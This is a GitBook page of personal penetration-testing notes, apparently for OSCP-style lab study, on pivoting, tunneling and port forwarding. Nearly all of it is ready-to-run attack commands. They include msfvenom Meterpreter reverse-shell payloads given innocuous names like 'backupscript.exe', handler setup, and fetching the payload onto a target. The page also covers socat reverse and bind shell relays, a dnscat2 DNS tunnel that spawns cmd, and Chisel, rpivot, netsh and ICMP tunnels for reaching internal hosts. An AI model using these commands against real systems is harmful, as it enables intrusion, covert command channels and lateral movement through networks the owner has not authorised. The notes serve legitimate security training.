📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • Dynamic Port Forwarding with SSH and SOCKS Tunneling
  • Local Port Forwarding
  • Dynamic Port Forwarding
  • Remote/Reverse Port Forwarding with SSH
  • Meterpreter Tunneling & Port Forwarding
  • Socat
  • Socat Redirection with a Reverse Shell
  • Socat Redirection with a Bind Shell
  • SSH for Windows: plink.exe
  • Dynamic port forwarding
  • SSH Pivoting with Sshuttle
  • Web Server Pivoting with Rpivot
  • Port Forwarding with Windows Netsh
  • DNS Tunneling with Dnscat2
  • SOCKS5 Tunneling with Chisel
  • Chisel Reverse Pivot
  • ICMP Tunneling with SOCKS
  1. SIde Notes

Pivoting, Tunneling, and Port Forwarding

Dynamic Port Forwarding with SSH and SOCKS Tunneling

Local Port Forwarding

# 1234 - attack host port
# 3306 - target host port
ssh -L 1234:localhost:3306 Ubuntu@ip

# Confirm 
netstat -antp | grep 1234

# Multiple port forward
ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@ip

Dynamic Port Forwarding

# Enabling Dynamic Port Forwarding
# 9050 - attack host port
ssh -D 9050 ubuntu@ip

# Editing proxychains configuration file /etc/proxychains.conf
# We can add socks4 127.0.0.1 9050 to the last line if it is not already there.

# Checking /etc/proxychains.conf
tail -4 /etc/proxychains.conf

# Using Nmap with Proxychains
proxychains nmap -v -sn 172.16.5.1-200 <--ip range which we were not able to scan before, i.e Internal Network
 
# Using Metasploit with Proxychains
proxychains msfconsole

# Using xfreerdp with Proxychains
proxychains xfreerdp /v:ip /u:eren /p:pass

Remote/Reverse Port Forwarding with SSH

# Creating a Windows Payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

# Configuring & Starting the multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000

# Transferring Payload to Pivot Host
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/

# Starting Python3 Webserver on Pivot Host
python3 -m http.server 8123

# Downloading Payload from Windows Target
PS C:\\Windows\\system32> Invoke-WebRequest -Uri "<http://172.16.5.129:8123/backupscript.exe>" -OutFile "C:\\backupscript.exe"

# SSH remote port forwarding
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

# RUN the payload and get a shell

Meterpreter Tunneling & Port Forwarding

# Creating Payload for Ubuntu Pivot Host
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.10 -f elf -o backupjob LPORT=8080

# Configuring & Starting the multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp

# Transfer and Execute the Payload on the Pivot Host

# After we get shell on Pivot host, we can user meterpreter modules for different tasks
# Ping Sweep module
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

# Ping Sweep For Loop on Linux Pivot Hosts
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

# Ping Sweep For Loop Using CMD
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

# Ping Sweep Using PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

# **Configuring MSF's SOCKS Proxy**

use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a

# Confirming Proxy Server is Running
jobs

# Adding a Line to proxychains.conf if Needed
socks4 	127.0.0.1 9050

# Creating Routes with AutoRoute
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run autoroute -s 172.16.5.0/23

# Testing Proxy & Routing Functionality
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

Port Forwarding - portfwd module

# Creating Local TCP Relay
portfwd add -l 3300 -p 3389 -r 172.16.5.19

# Connecting to Windows Target through localhost
xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Meterpreter Reverse Port Forwarding

# Reverse Port Forwarding Rules
portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

# Configuring & Starting multi/handler
# If we have a shell already, run bg command
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 8081
set LHOST 0.0.0.0

# Generating the Windows Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

Socat

Socat Redirection with a Reverse Shell

# Starting Socat Listener on pivot host
# 10.10.14.18:80 - atttack host ip and port 
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Creating the Payload - Windows
# 172.16.5.129 - ip of pivot host 
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

# Configuring & Starting the multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80

Socat Redirection with a Bind Shell

# Creating the Payload - Windows
# Bind shell
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443

# Starting Socat Bind Shell Listener
# 172.16.5.19:8443 - ip, port of system on internal network
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

# Configuring & Starting the Bind multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64 <-- ip of pivot host
set LPORT 8080 <-- port of pivot host

SSH for Windows: plink.exe

Dynamic port forwarding

# This starts an SSH session between the Windows attack host and the Ubuntu server, and then plink starts listening on port 9050.
plink -D 9050 ubuntu@10.129.15.50

# Proxifier - <https://www.proxifier.com/>
Proxifier can be used to start a SOCKS tunnel via the SSH session we created.

SSH Pivoting with Sshuttle

# Installation
sudo apt-get install sshuttle

# Running Sshuttle
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Web Server Pivoting with Rpivot

# Installation
sudo git clone <https://github.com/klsecservices/rpivot.git>

# python 2.7
sudo apt-get install python2.7

# Running server.py from the Attack Host
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

# Transfering rpivot to the Target
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

# Running client.py from Pivot Target
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

# Browsing to the Target Webserver using Proxychains
proxychains firefox-esr 172.16.5.135:80

# Connecting to a Web Server using HTTP-Proxy & NTLM Auth
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Port Forwarding with Windows Netsh

# Using Netsh.exe to Port Forward
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

# Verifying Port Forward
netsh.exe interface portproxy show v4tov4

# changing firewall rules to allow the traffic (if needed)
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=192.168.151.10 localport=8080 action=allow

# Connecting to the Internal Host through the Port Forward 
# traffice for 10.129.15.150:8080(pivot host ) will be forwarded to 172.16.5.25:3389(internal network host)
xfreerdp /v:10.129.15.150:8080 /u:eren /p:pass

DNS Tunneling with Dnscat2

# Cloning dnscat2 and Setting Up the Server
git clone <https://github.com/iagox86/dnscat2.git>
cd dnscat2/server/
gem install bundler
bundle install

# Starting the dnscat2 server, save secret key for future authentication 
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=domain.local --no-cache

# Cloning dnscat2-powershell to the Attack Host
git clone <https://github.com/lukebaggett/dnscat2-powershell.git>

# Importing dnscat2.ps1
PS C:\> Import-Module .\\dnscat2.ps1

# establish a tunnel with the server running on our attack host.
PS C:\> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain domain.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

# If eveything wokrs, we will get a shell, can use it to interact  
# Listing dnscat2 Options
dnscat2> ?

# Interacting with the Established Session 
dnscat2> window -i 1

SOCKS5 Tunneling with Chisel

# Setting Up & Using Chisel
git clone <https://github.com/jpillora/chisel.git>
cd chisel
go build

# Transferring Chisel Binary to Pivot Host
scp chisel ubuntu@10.129.202.64:~/

# Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5

# Connecting to the Chisel Server
./chisel client -v 10.129.202.64:1234 socks

# Editing & Confirming proxychains.conf
socks5 127.0.0.1 1080

# Pivoting to the DC
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Chisel Reverse Pivot

# Starting the Chisel Server on our Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5

# Then we connect from the pivot host to our attack host, using the option R:socks
./chisel client -v 10.10.14.17:1234 R:socks

# Editing & Confirming proxychains.conf
socks5 127.0.0.1 1080

# Pivoting to internal host
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

ICMP Tunneling with SOCKS

# Setting Up & Using ptunnel-ng
git clone <https://github.com/utoni/ptunnel-ng.git>

# Building Ptunnel-ng with Autogen.sh
sudo ./autogen.sh

# Transferring Ptunnel-ng to the Pivot Host
scp -r ptunnel-ng ubuntu@10.129.202.64:~/

# Starting the ptunnel-ng Server on the Target Host
sudo ./ptunnel-ng -r10.129.202.64 -R22

# Connecting to ptunnel-ng Server from Attack Host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

# Tunneling an SSH connection through an ICMP Tunnel
ssh -p2222 -lubuntu 127.0.0.1

# Enabling Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

# Proxychaining through the ICMP Tunnel
proxychains nmap -sV -sT 172.16.5.19 -p3389
PreviousRemote Password AttacksNextFile Encryption

Last updated 2 years ago